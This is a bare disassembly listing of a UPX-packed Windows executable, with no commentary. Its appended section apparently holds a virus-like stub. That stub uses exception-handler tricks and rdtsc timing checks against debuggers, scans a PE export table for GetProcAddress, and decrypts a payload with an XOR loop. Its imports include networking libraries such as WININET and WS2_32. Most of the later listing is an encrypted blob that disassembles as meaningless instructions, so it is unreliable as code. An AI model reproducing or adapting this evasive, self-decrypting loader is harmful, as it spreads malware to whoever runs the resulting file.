3A0B6972h, 0BFBDEC97h, 486573C8h, 0C646E61h dd 0C25E2447h, 8B6C3BDh, 5A61D26Eh, 0B5CDB3F0h, 0A3449711h dd 14796456h, 0B6DF75BBh, 2B61984Ch, 6F666E49h, 6509530Fh dd 37800670h, 9C496218h, 64656B26h, 64D98845h, 6EB328B3h dd 92E7FB36h, 12E0D0CDh, 6464410Bh, 0F7B30F72h, 4C0B111Dh dd 61726269h, 0E68AB567h, 4D2B60DAh, 36137C82h, 0D5CB080Bh dd 0C363CF8Eh, 547B42DAh, 75888169h, 4915DE65h, 0E94D8AD8h dd 1BDA3478h, 0DD29B36h, 0F239C45Dh, 4F116610h, 78455A62h dd 0B3612DB6h, 630ADF31h, 9B9E6D13h, 522DC6E0h, 87B591Bh dd 1766C0E0h, 38657A86h, 0A3604CA7h, 451585B5h, 0D160C3FCh dd 33759F9Dh, 0A1673A2Bh, 4579654Bh, 0CE40EC3Bh, 0FC18610h dd 5EC00A51h, 11F65AC2h, 5987309Eh, 21E7426Ch, 841CE010h dd 0C517B76h, 0BE6E6241h, 0E2B6853h, 310428A5h, 1AC13F86h dd 3677D985h, 62BB1089h, 440A7DB6h, 720E6112h, 0D61B6669h dd 0CA79B63Ah, 2B758F67h, 616F6C36h, 6FCE436Fh, 6F112C79h dd 67702350h, 0E8F5210h, 38F63F90h, 4114B4D0h, 69757163h dd 74AE7072h, 35494DD8h, 0C3363AA0h, 0DE1359A7h, 0CA7273ECh dd 18B16D06h, 35B2D1CEh, 150F920Eh, 536B99DAh, 445F1D4Dh dd 740AC558h, 685F3FB8h, 3627F9F6h, 2CC46DBh, 4F727907h dd 880110E9h, 9160AD15h, 1CC2D22h, 271DCD34h, 61150E65h dd 14362CC2h, 0BBB4E70Ah, 4906EE15h, 70737766h, 4166B105h dd 9C62834Fh, 424F466h, 0DB616C5Ah, 9B558543h, 370E1141h dd 6705212Ch, 1B866B14h, 6E0306A6h, 74534349h, 8C950E81h dd 0D471A65h, 0A8EDB2CBh, 273FFA1h, 2C010D02h, 392CB2CBh dd 0C17346Fh, 0B2CB2CB2h, 10130409h, 4F45AA16h, 455036AAh dd 0E4FFB60Eh, 59C896B7h, 0E00040D8h, 0B010F00h, 260C0601h dd 68011CB2h, 2334DC12h, 0C6A32510h, 0B31420Eh, 0B7334A02h dd 0C079BA4h, 39341E60h, 10B0364Bh, 2D570607h, 6210805Dh dd 7C64098Ch, 0B0AE3145h, 6A2E1E01h, 0B60D8180h, 269024A6h dd 7C7B64C4h, 0E0049F90h, 0FBE1642Eh, 0D85BA114h, 272A0737h dd 48C016h, 81434BE0h, 54C32Fh, 2 dup(0) db 90h db 0FFh, 2 dup(0) align 10h pusha mov esi, offset dword_31426000 lea edi, [esi-5000h] push edi or ebp, 0FFFFFFFFh jmp short loc_31427BD2 ; --------------------------------------------------------------------------- align 8 loc_31427BC8: ; CODE XREF: UPX1:loc_31427BD9j mov al, [esi] inc esi mov [edi], al inc edi loc_31427BCE: ; CODE XREF: UPX1:31427C66j ; UPX1:31427C7Dj add ebx, ebx jnz short loc_31427BD9 loc_31427BD2: ; CODE XREF: UPX1:31427BC0j mov ebx, [esi] sub esi, 0FFFFFFFCh adc ebx, ebx loc_31427BD9: ; CODE XREF: UPX1:31427BD0j jb short loc_31427BC8 mov eax, 1 loc_31427BE0: ; CODE XREF: UPX1:31427BEFj ; UPX1:31427BFAj add ebx, ebx jnz short loc_31427BEB mov ebx, [esi] sub esi, 0FFFFFFFCh adc ebx, ebx loc_31427BEB: ; CODE XREF: UPX1:31427BE2j adc eax, eax add ebx, ebx jnb short loc_31427BE0 jnz short loc_31427BFC mov ebx, [esi] sub esi, 0FFFFFFFCh adc ebx, ebx jnb short loc_31427BE0 loc_31427BFC: ; CODE XREF: UPX1:31427BF1j xor ecx, ecx sub eax, 3 jb short loc_31427C10 shl eax, 8 mov al, [esi] inc esi xor eax, 0FFFFFFFFh jz short loc_31427C82 mov ebp, eax loc_31427C10: ; CODE XREF: UPX1:31427C01j add ebx, ebx jnz short loc_31427C1B mov ebx, [esi] sub esi, 0FFFFFFFCh adc ebx, ebx loc_31427C1B: ; CODE XREF: UPX1:31427C12j adc ecx, ecx add ebx, ebx jnz short loc_31427C28 mov ebx, [esi] sub esi, 0FFFFFFFCh adc ebx, ebx loc_31427C28: ; CODE XREF: UPX1:31427C1Fj adc ecx, ecx jnz short loc_31427C4C inc ecx loc_31427C2D: ; CODE XREF: UPX1:31427C3Cj ; UPX1:31427C47j add ebx, ebx jnz short loc_31427C38 mov ebx, [esi] sub esi, 0FFFFFFFCh adc ebx, ebx loc_31427C38: ; CODE XREF: UPX1:31427C2Fj adc ecx, ecx add ebx, ebx jnb short loc_31427C2D jnz short loc_31427C49 mov ebx, [esi] sub esi, 0FFFFFFFCh adc ebx, ebx jnb short loc_31427C2D loc_31427C49: ; CODE XREF: UPX1:31427C3Ej add ecx, 2 loc_31427C4C: ; CODE XREF: UPX1:31427C2Aj cmp ebp, 0FFFFF300h adc ecx, 1 lea edx, [edi+ebp] cmp ebp, 0FFFFFFFCh jbe short loc_31427C6C loc_31427C5D: ; CODE XREF: UPX1:31427C64j mov al, [edx] inc edx mov [edi], al inc edi dec ecx jnz short loc_31427C5D jmp loc_31427BCE ; --------------------------------------------------------------------------- align 4 loc_31427C6C: ; CODE XREF: UPX1:31427C5Bj ; UPX1:31427C79j mov eax, [edx] add edx, 4 mov [edi], eax add edi, 4 sub ecx, 4 ja short loc_31427C6C add edi, ecx jmp loc_31427BCE ; --------------------------------------------------------------------------- loc_31427C82: ; CODE XREF: UPX1:31427C0Cj pop esi mov edi, esi mov ecx, 7Eh loc_31427C8A: ; CODE XREF: UPX1:31427C91j ; UPX1:31427C96j mov al, [edi] inc edi sub al, 0E8h loc_31427C8F: ; CODE XREF: UPX1:31427CB4j cmp al, 1 ja short loc_31427C8A cmp byte ptr [edi], 1 jnz short loc_31427C8A mov eax, [edi] mov bl, [edi+4] shr ax, 8 rol eax, 10h xchg al, ah sub eax, edi sub bl, 0E8h add eax, esi mov [edi], eax add edi, 5 mov eax, ebx loop loc_31427C8F lea edi, [esi+5000h] loc_31427CBC: ; CODE XREF: UPX1:31427CDEj mov eax, [edi] or eax, eax jz short loc_31427D07 mov ebx, [edi+4] lea eax, [eax+esi+7000h] add ebx, esi push eax add edi, 8 call dword ptr [esi+708Ch] xchg eax, ebp loc_31427CD9: ; CODE XREF: UPX1:31427CFFj mov al, [edi] inc edi or al, al jz short loc_31427CBC mov ecx, edi jns short near ptr loc_31427CEA+1 movzx eax, word ptr [edi] inc edi push eax inc edi loc_31427CEA: ; CODE XREF: UPX1:31427CE2j mov ecx, 0AEF24857h push ebp call dword ptr [esi+7090h] or eax, eax jz short loc_31427D01 mov [ebx], eax add ebx, 4 jmp short loc_31427CD9 ; --------------------------------------------------------------------------- loc_31427D01: ; CODE XREF: UPX1:31427CF8j call dword ptr [esi+7094h] loc_31427D07: ; CODE XREF: UPX1:31427CC0j popa jmp loc_31422334 ; --------------------------------------------------------------------------- align 400h UPX1 ends ; Section 3. (virtual address 00008000) ; Virtual size : 0002A000 ( 172032.) ; Section size in file : 0002A000 ( 172032.) ; Offset to raw data for section: 00008000 ; Flags E0000060: Text Data Executable Readable Writable ; Alignment : default ; =========================================================================== ; Segment type: Pure code ; Segment permissions: Read/Write/Execute UPX2 segment para public 'CODE' use32 assume cs:UPX2 ;org 31428000h assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing dd 3 dup(0) dd 80C4h, 808Ch, 3 dup(0) dd 80D1h, 809Ch, 3 dup(0) dd 80DEh, 80A4h, 3 dup(0) dd 80E9h, 80ACh, 3 dup(0) dd 80F4h, 80B4h, 3 dup(0) dd 8100h, 80BCh, 5 dup(0) dd 7C801D77h dword_31428090 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; UPX2:31432052r ... dd 7C81CDDAh, 0 dd 77DD6BF0h, 0 dd 77C371D3h, 0 dd 7E41A8ADh, 0 dd 42C2C8A1h, 0 dd 71AB9639h, 0 dd 4E52454Bh, 32334C45h, 4C4C442Eh, 56444100h, 33495041h dd 6C642E32h, 534D006Ch, 54524356h, 6C6C642Eh, 45535500h dd 2E323352h, 6C6C64h, 494E4957h, 2E54454Eh, 6C6C64h, 5F325357h dd 642E3233h, 6C6Ch, 64616F4Ch, 7262694Ch, 41797261h, 65470000h dd 6F725074h, 64644163h, 73736572h, 78450000h, 72507469h dd 7365636Fh, 73h, 43676552h, 65736F6Ch, 79654Bh, 61720000h dd 646Eh, 72707377h, 66746E69h, 41h, 65746E49h, 74656E72h dd 6E65704Fh, 41h, 26h dup(0) dd 1C39068h, 0FFC48BEDh, 0E85B93D0h, 59h, 824648Bh, 4EBB8h dd 64FAEB00h, 18A167h, 0F30408Bh, 830240B6h, 3C7500F8h dd 0E8h, 0ED815D00h, 402334h, 237B858Bh, 85030040h, 402383h dd 858BF08Bh, 40237Fh, 23838503h, 8B500040h, 0ACC933FEh dd 238B8532h, 41AA0040h, 23878D3Bh, 0EF7C0040h, 64C02BC3h dd 896430FFh, 5678B820h, 3871234h, 6000h, 7BB0h, 31420000h dd 1E00h, 78h, 75Dh dup(0) ; --------------------------------------------------------------------------- cmc stc jmp short $+2 push ebp mov ebp, esp call loc_3142A019 clc call sub_3142A0BE jmp short $+2 jmp loc_3142A053 ; --------------------------------------------------------------------------- loc_3142A019: ; CODE XREF: UPX2:3142A007p push dword ptr fs:0 add ds:dword_3142A05B, ebp cld cld nop mov fs:0, esp xor edx, edx push edx push edx push 80000000h push edx push 80000000h push 80000000h push 1000h push edx push 100h call ds:dword_31428090 ; GetProcAddress loc_3142A053: ; CODE XREF: UPX2:3142A014j mov ecx, ecx cmc nop stc jmp short $+2 ; --------------------------------------------------------------------------- db 0BDh dword_3142A05B dd 12FFC0h ; --------------------------------------------------------------------------- cmc stc sub eax, eax loc_3142A063: ; CODE XREF: UPX2:3142A069j dec al or al, al jz short loc_3142A06D jnz short loc_3142A063 jmp short near ptr loc_3142A0D2+2 ; --------------------------------------------------------------------------- loc_3142A06D: ; CODE XREF: UPX2:3142A067j stc cld xchg ebx, ebx cld call sub_3142A07A xchg ebx, ebx cld ; =============== S U B R O U T I N E ======================================= sub_3142A07A proc near ; CODE XREF: UPX2:3142A072p pop ebx jmp short $+2 cld add ebx, 64h xor edi, edi or edi, 2990h clc mov esi, 0FFh cld cld push ebx cld stc mov ebx, ebx loc_3142A099: ; CODE XREF: sub_3142A07A+2Dj call sub_3142A0CD nop cld add ebx, 1 dec edi nop or edi, edi jnz short loc_3142A099 pop ebx xchg ebx, ebx mov esi, [ebp-8] mov fs:0, esi clc leave mov edx, edx jmp short $+2 jmp ebx sub_3142A07A endp ; sp-analysis failed ; --------------------------------------------------------------------------- clc ; =============== S U B R O U T I N E ======================================= sub_3142A0BE proc near ; CODE XREF: UPX2:3142A00Dp arg_C = dword ptr 10h mov edx, [esp+arg_C] xor eax, eax pop dword ptr [edx+0B8h] retn sub_3142A0BE endp ; sp-analysis failed ; --------------------------------------------------------------------------- jmp short $+2 ; =============== S U B R O U T I N E ======================================= sub_3142A0CD proc near ; CODE XREF: sub_3142A07A:loc_3142A099p xchg al, [ebx] jmp short $+2 clc loc_3142A0D2: ; CODE XREF: UPX2:3142A06Bj xor ax, si mov eax, eax mov [ebx], al retn sub_3142A0CD endp ; --------------------------------------------------------------------------- clc call $+5 mov eax, [esp] cld mov [eax+32C7h], ebx mov ecx, [eax+297Fh] mov ebx, [esp+4] and ecx, 10000000h jz short loc_3142A127 pop ecx mov [eax+32CBh], esi mov cl, [eax+2983h] mov [eax+32CFh], edi cmp cl, 0E8h jz short loc_3142A11C mov ebx, [eax+2985h] jmp short loc_3142A125 ; --------------------------------------------------------------------------- loc_3142A11C: ; CODE XREF: UPX2:3142A112j add ebx, [eax+2984h] mov ebx, [ebx+2] loc_3142A125: ; CODE XREF: UPX2:3142A11Aj mov ebx, [ebx] loc_3142A127: ; CODE XREF: UPX2:3142A0FAj push ebp mov ebp, eax sub dword ptr [esp+4], 1EE0h sub ebp, 101005h mov edi, [esp+4] lea esi, [ebp+103990h] mov ecx, 0 rep movsb call sub_3142A200 mov ecx, eax call sub_3142A200 sub eax, ecx jz short loc_3142A1D2 cmp eax, 100h ja short loc_3142A1D2 and ebx, 0FFFFF000h loc_3142A166: ; CODE XREF: UPX2:3142A175j cmp dword ptr [ebx+4Eh], 73696854h jz short loc_3142A177 loc_3142A16F: ; CODE XREF: UPX2:3142A184j sub ebx, 100h jnz short loc_3142A166 loc_3142A177: ; CODE XREF: UPX2:3142A16Dj mov eax, ebx add eax, [ebx+3Ch] mov edx, [eax+78h] cmp word ptr [eax], 4550h jnz short loc_3142A16F add edx, ebx mov esi, [edx+20h] mov ecx, [edx+18h] add esi, ebx push ecx loc_3142A191: ; CODE XREF: UPX2:loc_3142A1A5j lodsd add eax, ebx cmp word ptr [eax+2], 5074h jnz short loc_3142A1A5 cmp dword ptr [eax+5], 6441636Fh jz short loc_3142A1AA loc_3142A1A5: ; CODE XREF: UPX2:3142A19Aj loop loc_3142A191 pop ecx jmp short loc_3142A1D2 ; --------------------------------------------------------------------------- loc_3142A1AA: ; CODE XREF: UPX2:3142A1A3j sub [esp], ecx mov esi, [edx+24h] pop ecx add esi, ebx movzx eax, word ptr [esi+ecx*2] mov edi, [edx+1Ch] add edi, ebx mov esi, [edi+eax*4] add esi, ebx lea eax, [ebp+10113Fh] mov dx, [eax-17h] call sub_3142A205 jmp short loc_3142A21A ; --------------------------------------------------------------------------- loc_3142A1D2: ; CODE XREF: UPX2:3142A157j ; UPX2:3142A15Ej ... mov eax, [ebp+103984h] loc_3142A1D8: ; CODE XREF: UPX2:3142A203j and eax, 10000000h jz short loc_3142A1FE mov edi, [esp+4] lea esi, [ebp+103988h] lodsd mov ebx, [ebp+1042CCh] stosd movsb mov edi, [ebp+1042D4h] mov esi, [ebp+1042D0h] loc_3142A1FE: ; CODE XREF: UPX2:3142A1DDj pop ebp retn ; =============== S U B R O U T I N E ======================================= sub_3142A200 proc near ; CODE XREF: UPX2:3142A149p ; UPX2:3142A150p rdtsc retn sub_3142A200 endp ; --------------------------------------------------------------------------- jb short loc_3142A1D8 ; =============== S U B R O U T I N E ======================================= sub_3142A205 proc near ; CODE XREF: UPX2:3142A1CBp push ebx mov ecx, 2845h mov ebx, edx loc_3142A20D: ; CODE XREF: sub_3142A205+11j xor [eax], dl sub dl, bl xchg bl, bh inc eax xchg dl, dh loop loc_3142A20D pop ebx retn sub_3142A205 endp ; --------------------------------------------------------------------------- loc_3142A21A: ; CODE XREF: UPX2:3142A1D0j call far ptr 706Eh:8E0000DFh xor eax, 0D570E2D9h test al, 85h cmp [ebx-1Eh], ch push 1077BE8Fh stosb cld or ch, bh inc eax adc [esi], esi loc_3142A237: ; CODE XREF: UPX2:3142A264j dec ecx les esi, ds:0A481C620h or edi, [eax+23E44F8Ah] pop ecx test dh, ch dec esi loop loc_3142A2A1 inc edi and [esi+28h], ebp fimul word ptr [ebp-40056D9Fh] iret ; --------------------------------------------------------------------------- mov [edx+55h], esp lds esi, ds:0D2B23646h and [edi-0E6A5624h], edi jno short loc_3142A237 test al, 0BFh add al, 0AEh dec edx loc_3142A26B: ; CODE XREF: UPX2:3142A2ACj sbb [ebx], dh or [esi+5E6D8CB0h], bh aam 97h inc ebx or [ecx+7D3C837Bh], edi mov al, 70h stosd pop ebp mov bl, 4Fh retf ; --------------------------------------------------------------------------- db 0F4h dd 0ECE624D8h ; --------------------------------------------------------------------------- retn ; --------------------------------------------------------------------------- db 6Bh ; --------------------------------------------------------------------------- loc_3142A28A: ; CODE XREF: UPX2:3142A2AAj xchg eax, edx stosd adc [ebp-1660576h], ebp clc dec edi dec eax jb short loc_3142A2F2 ; --------------------------------------------------------------------------- db 8Eh dd 9CF2F671h, 7D1BD005h ; --------------------------------------------------------------------------- pushf loc_3142A2A1: ; CODE XREF: UPX2:3142A248j jno short loc_3142A2D0 inc esp sbb eax, 0D4315364h dec esi loope loc_3142A28A jo short loc_3142A26B outsb aad 0Ch cmp dword ptr [edi], 0B64C3DABh mov edi, eax adc ebx, [edx-0Ah] jo short loc_3142A2CE out dx, al push 0FFFFFFBAh out dx, eax setalc test [eax+17827C4h], ecx sub al, 7Ch pop ebx sal ch, 1 loc_3142A2CE: ; CODE XREF: UPX2:3142A2BCj jmp short near ptr byte_3142A329 ; --------------------------------------------------------------------------- loc_3142A2D0: ; CODE XREF: UPX2:loc_3142A2A1j stc retn 0CC7Ah ; --------------------------------------------------------------------------- dd 672BA1C1h, 2B2961Ah, 0E430860h, 98B53A5Ch, 0D138EAEDh dd 4CA2F94h, 75EACCBFh db 0CCh db 0A2h ; --------------------------------------------------------------------------- loc_3142A2F2: ; CODE XREF: UPX2:3142A295j ror dword ptr [eax+2A3696FCh], 1 mov dword ptr [esi], 0B8209392h daa pop eax or dh, [edx+ebx*8] aaa xor [eax-2B8B6E6Ch], cl add dl, ds:0AC5520AEh[eax] idiv edx nop dec esp and dl, [ecx+edi*8-1Ch] mov cl, 0FFh out 0, al nop sahf lodsd xchg eax, edi xor eax, 3434BC13h mov al, 0B9h ; --------------------------------------------------------------------------- byte_3142A329 db 8Eh, 0F2h, 0ABh ; CODE XREF: UPX2:loc_3142A2CEj ; --------------------------------------------------------------------------- jo short loc_3142A393 ; CODE XREF: UPX2:3142A36Dj imul ecx, [ecx-62h], 52h sbb bl, [ebp+ecx+284AD463h] setalc fstp1 st(7) mov bl, [eax+5Dh] mov ebp, 921F27A5h add edx, [esi] retn 0D59Fh ; --------------------------------------------------------------------------- dw 23Eh dd 0A220A807h, 3C924570h, 66166D88h, 0E30CF031h, 6D8AA3C0h dd 2365BA59h, 186D667h db 83h, 44h, 0A2h ; --------------------------------------------------------------------------- loc_3142A36B: ; CODE XREF: UPX2:3142A3D2j xor [ecx], esi loopne near ptr loc_3142A32C+1 loc_3142A36F: ; CODE XREF: UPX2:3142A3EDj mov cl, 4Ch bound esi, [edx-9C297F1h] xchg eax, esi adc [eax+75A0D32Ch], esp out dx, al adc bh, [eax] enter 7748h, 0D8h into sbb word ptr [esi+edi*8+32102F82h], 449Eh ; CODE XREF: UPX2:loc_3142A3F4j ; --------------------------------------------------------------------------- db 0C4h, 0BEh, 0EDh ; --------------------------------------------------------------------------- loc_3142A393: ; CODE XREF: UPX2:loc_3142A32Cj mov ch, 49h pop esp mov esi, 0F2676438h insb adc eax, 9CFD30F6h jb short loc_3142A3C3 inc edi mov ecx, 0E234B974h ; CODE XREF: UPX2:3142A3A9j lock jb short near ptr loc_3142A3A4+3 sbb ds:6B0C557Eh, ch retf ; --------------------------------------------------------------------------- db 0ADh dd 9DCDC28h, 9D8D51Dh, 177B6F6Ah db 42h, 0FAh, 0Ah ; --------------------------------------------------------------------------- loc_3142A3C3: ; CODE XREF: UPX2:3142A3A1j cld imul eax, [edi-5F1D335Bh], 0F7D0CB52h ficom dword ptr [ecx] out dx, al push edx jp short loc_3142A36B push cs lodsb xchg eax, esi fldcw word ptr [edx+52h] idiv byte ptr [edi+0Ch] pusha xor [eax], ebx db 2Eh test bh, dl out 0F5h, eax mov eax, ds:6E8456D0h adc [edx+3Dh], edx ; CODE XREF: UPX2:3142A439j jnz short loc_3142A36F retf ; --------------------------------------------------------------------------- loc_3142A3F0: ; CODE XREF: UPX2:3142A42Aj fsub qword ptr [edx] jmp short loc_3142A435 ; --------------------------------------------------------------------------- loc_3142A3F4: ; CODE XREF: UPX2:3142A411j jnp short near ptr loc_3142A386+4 add ebp, [ebx-41EE29FCh] ror byte ptr [esi], cl mov esi, 4E853C5Dh mov bh, 5Ah in al, 0E6h ; --------------------------------------------------------------------------- db 9Ah ; --------------------------------------------------------------------------- icebp cld cmp al, 7Bh nop loc_3142A40D: ; CODE XREF: UPX2:3142A437j outs dx, byte ptr [si] les esp, [ebx] ja short loc_3142A3F4 daa fmul dword ptr [ebp+ebx*8-4] db 3Eh cwde ; --------------------------------------------------------------------------- dw 0D362h ; --------------------------------------------------------------------------- push dword ptr [eax-71h] mov ds:97937299h, al cmp [edi], bh inc ebx daa push 1Eh loop loc_3142A3F0 add [ecx+71h], ch adc [ebx+23EF0AFBh], ah loc_3142A435: ; CODE XREF: UPX2:3142A3F2j xchg eax, ecx cld ja short loc_3142A40D jbe short near ptr loc_3142A3EA+2 mov ecx, 726FA11Fh ; CODE XREF: UPX2:3142A45Ej jns short loc_3142A458 mov bl, 47h sbb [edi], cl loc_3142A446: ; CODE XREF: UPX2:3142A45Cj sub esp, [ebx+0Ah] into retn 59E8h ; --------------------------------------------------------------------------- db 0C7h, 0AFh, 64h dd 86B317E3h, 0A1FEEC98h ; --------------------------------------------------------------------------- loc_3142A458: ; CODE XREF: UPX2:3142A440j movsd inc esi xor bh, dh jge short loc_3142A446 jno short near ptr loc_3142A43B+2 fdiv qword ptr [ecx-5Bh] dec ebp clc mov ds:0AA647E5Fh, al and [edx], edi xor esp, [edx-2] db 36h mov ch, 35h mov al, 8Fh add ah, [ebx+edi*2+203675Ch] inc ebx sbb [ecx+2Eh], ebp popf mov esp, 26BA4E47h fistp dword ptr [ecx+0FD592AEh] scasd pop ebp fcomp dword ptr [esi+11542C05h] ror byte ptr [edi], cl mov [ebp-75h], bh sub byte ptr [ebx+67h], 0E7h mov ebp, 0FAC10E50h adc ebp, [eax] mov eax, ds:23847713h db 36h mov ebx, 0A89AAFE9h push ss cmp [esi+2], edi call far ptr 8002h:0B636E4A4h fcom st(2) mov esp, [eax+10h] out dx, al xor eax, 0C55B2A16h repne retf 0E76h ; --------------------------------------------------------------------------- dd 5B7CD021h, 61DD20D0h, 8D96BAACh, 8D1D2C08h, 7F39864Eh dd 0DA4A02Ah, 0DB83836h, 0B3EAFC78h, 1B48EE94h, 25C122E1h dd 0F18C3733h, 7029FCF8h, 79DA981h, 0DDAEB127h, 27CABFB1h dd 2A5F6448h, 6002BE78h, 0C4BBEB7Fh, 8F2A7241h, 0BBD341C8h dd 0AC7236F0h, 0C7DAD0E0h, 0F855B03Ch, 71F8EAADh, 0E4220B54h dd 5A16DC05h, 871A428Dh, 0C9369CB9h, 46169397h, 2D092582h dd 0BEFCC38Eh, 54C16174h, 0DB2A0934h, 1ADEB855h, 2FB85ED9h dd 0FB839388h, 0A432D69Ah, 7368B53Fh, 0A7007ACCh, 9479D692h dd 5BB21042h, 0B5BFA089h, 0EEF1754Ch, 3DD230E1h, 598769D3h dd 2E2EE09Eh, 41EFC94Ah, 0D166B4E7h, 0BE7DA9A0h, 858E668Eh dd 0B9CE72A9h, 3D288F0Eh, 0E70D8816h, 0ED64C8A4h, 0D2D530F6h dd 0A1564A2Eh, 27160E51h, 50F6C063h, 66A9820Ch, 308C3FB9h dd 73ED00C1h, 3CDCE560h, 742ECE00h, 55536EBh, 6C831F9Ch dd 755EF8DEh, 2E2C02B8h, 26C5FC58h, 238C48B1h, 0D40EE540h dd 9315B528h, 0C4891C5Ch, 9B3251A2h, 0AC30D58h, 0DAA57133h dd 0A96642CEh, 0C71358EFh, 5DAE3108h, 915F756Bh, 0EEE6F466h dd 7B3C18E1h, 3EDE7190h, 453A0D53h, 793C4CA2h, 0D318A68Eh dd 298E0168h, 0ED6ED11Ch, 0EDACE438h, 0D91DCADFh, 0A1A11026h dd 2629C28Ch, 0B6C9C640h, 0F2C7FB3Bh, 0AF6EC0F5h, 0A8DA7BADh dd 0A198AE8Dh, 2B065D34h, 3D21B393h, 53FACA34h, 7216ECBAh dd 723246AAh, 0CD4EA0C0h, 276AFADCh, 58654F8h, 0DBA2AE3Dh dd 64BE0830h, 1A25311Ah, 0E9E6825Ah, 0C7BE4F2Fh, 7FD50560h dd 62C70952h, 51763DA5h, 211781A6h, 8C9EC82Eh, 4FF87EA9h dd 0B9C06448h, 7CBEE664h, 1D7B2BEFh, 0B143E8CCh, 462398D1h dd 170318B1h, 0D53FCD85h, 1D0FFD5Ch, 0B64C16h, 0F390E6C1h dd 7FB2D360h, 0D96F191Dh, 9543A9F9h, 2E287CFBh, 0F92D0CB3h dd 9A29A6BAh, 3596586Bh, 0DFC0F257h, 4ECE8E25h, 138B5F2Eh dd 0AD6FD21Dh, 5822AFF1h, 15F2DC2h, 0A333E4A9h, 5917B18Dh dd 0E4FC3F74h, 0AFEDB061h, 52BE6B59h, 0F2891608h, 0AA71CD11h dd 206C5B90h, 0CD5F06CDh, 8D39A1ADh, 211A7281h, 0ADEAE165h dd 66CFA85Fh, 992514Ch, 0DF83EB26h, 708CAB70h, 3B7F36EDh dd 0A15AF3C7h, 10229AA1h, 1C0003D2h, 0B8E2D98Ch, 49E3046Ch dd 0E3962A5Dh, 81BFDD22h, 5393546Ch, 0F47F38EDh, 0A05D92C1h dd 283A53B9h, 0CA032EB1h, 73C0D49Dh, 32EE4B71h, 0C7DFFA52h dd 6A9DE235h, 59F7A1Ch, 0B766D7E1h, 684C99D2h, 36392FC8h dd 0A503E3D8h, 4EEE97B2h, 0E0E43143h, 0ABDFF52Ch, 5CBA650Eh dd 0F69F0F30h, 996B8780h, 324E75D1h, 0C00E11D4h, 9E0EAABAh dd 303928B1h, 0C2FFD678h, 65DF9A58h, 0EB37821h, 0FAEED105h dd 725E9E19h, 107634F5h, 0CB03F6C0h, 732A9D97h, 16092089h dd 9E96C267h, 56E47241h, 0E2A71332h, 0A692FF32h, 35635378h dd 0EE4E01C2h, 9B77ADDDh, 22284DAAh, 0C61F0889h, 4F92976Ah dd 11CA514Fh, 0D6B8E855h, 11A79D2Ah, 3D725F39h, 8A69FDF9h dd 7353B4CAh, 9194CADh, 0BA34C881h, 4CC3656Ch, 0E9C32A6Ch dd 0AEC6F55Fh, 6B8C6B24h, 0F09D0702h, 0BF1AB1FFh, 2C5573DAh dd 916105B7h, 8E1CB9A6h, 25DA2A88h, 0C2C3E777h, 45F0ED47h dd 65AA4035h, 0F98EF73Fh, 587380E1h, 1A4032D0h, 0A83AD5A2h dd 746ABBAFh, 0E8C0209Dh, 0B2F6CB78h, 66BE6D5Dh, 0FFBF0720h dd 9A8FEF68h, 177F73F0h, 0C94B1DC9h, 9B238CD3h, 3C0F70BDh dd 0C5D77E91h, 53EEB97Dh, 10CD5745h, 0D5BFCA2Eh, 7AA4E601h dd 0C7B34F2h, 0AB46DBF0h, 764697D7h, 1E1627A6h, 0B012C1B6h dd 6EEE4C0Ch, 0FAC3364Ch, 8AA0E630h, 58827916h, 0C3790F1Bh dd 9F43AFF7h, 83650B4h, 0D13F1DA2h, 93139489h, 2DD82C6Dh dd 0D2D7F467h, 7F9E8534h, 148F5933h, 0B548940Bh, 7A479CD7h dd 76E2DC4h, 0BC3FC1A3h, 290EB99Bh, 0F1D1224Ah, 0B8DAD145h dd 43A96F6Fh, 91880B31h, 9941CA3Ah, 206A79F5h, 0ED5F01F9h dd 9A39BE98h, 53015581h, 0CCC3F44Eh, 62C38C6Ch, 32A07B4Fh dd 0D296ED31h, 5BFE861Fh, 0A6A0DF8h, 0A55FDAC6h, 571CF6A1h dd 130B20AFh, 0B4E5D8ACh, 65D5777Dh, 0E5A7355Bh, 0AAAAF650h dd 6C94771Ch, 0F0620FEDh, 0BD32A8CBh, 223C70B4h, 0D3091FA8h dd 75F4BDAEh, 16CE4F61h, 0C7D1E555h, 7B94E235h, 1B934939h dd 0A57CDFFDh, 7C4382CFh, 192523C8h, 0B40DCB8Ch, 5FCCFE9Ah dd 0F1F72A47h, 0ADD3E449h, 55B7793Ch, 0FC9F0329h, 0BF0EB9F2h dd 297F76E8h, 0C52917D1h, 89169DB1h, 1194699h, 0DCF4C363h dd 7BC28F41h, 63B5582Dh, 0EEAFC337h, 63788B08h, 122634EDh dd 0AE31F1D8h, 4E3D97A3h, 1C7A2689h, 0BCF8C267h, 54B27247h dd 0E2A61425h, 9E88CE2Fh, 246B7516h, 0F8471C94h, 904DC8C6h dd 3C5A46A2h, 0CC1D1F87h, 6DDBD670h, 33DC5554h, 0DB89FE59h dd 59839737h, 7665015h, 0AB5798F5h, 714897D8h, 1C1138ADh dd 0BD1DE590h, 59ED656Eh, 0F3F93E79h, 0E1A3C059h, 5E96601Dh dd 0E19B0602h, 817FB2C3h, 277F1CE9h, 0CD2013B0h, 8D21A485h dd 25DF4499h, 0F8A6C574h, 79A7AA5Ah, 37AA5D3Eh, 0F99EF309h dd 197380E1h, 326402E5h, 0FF7DE990h, 6B26BEF2h, 0E6E306F8h dd 0A8CDC257h, 4CDB4355h, 0E8BF304Ch, 8793CC27h, 66B73CFh dd 0CF2E31D8h, 821BADD9h, 71F56BDh, 0CEF71295h, 5DFA055h dd 0CDD577Eh, 0D880F82Dh, 56979308h, 3B0E01F8h, 0C5406CAFh dd 0F5CDA2EEh, 84304FBEh, 2A28B082h, 3FD85299h, 0DF72D728h dd 0B582E012h, 0C2F6609Fh, 8734D4E9h, 0E1E24798h, 4B4ADCEAh dd 8EA5315Dh, 0FF128324h, 0D47E2C08h, 0D9B1A268h, 5CCB8A40h dd 6280690Ch, 4A5658F3h, 7176BE40h, 266C19F0h, 0F1BC3733h dd 0EDF5FCF8h, 6D07A908h, 5EAEA01Eh, 0BA0902F8h, 81DB90CDh dd 81CB8D74h, 75764A90h, 143A40ACh, 93079D0Ch, 392376A4h dd 0A54E0318h, 57A4B048h, 5F24A1C7h, 7F618E44h, 902CDB50h dd 0AD834D4Ch, 0EA6E465Fh, 10053506h, 82AFB81Fh, 53855503h dd 31A604BDh, 0F92E3664h, 3155B850h, 0F3711206h, 997E2CE2h dd 9932D6A4h, 4D2472C2h, 0A71896B4h, 5086BEF8h, 0CE5D7E47h dd 0B5AEB6E6h, 9A25BB13h, 69E6024Eh, 0B2666901h, 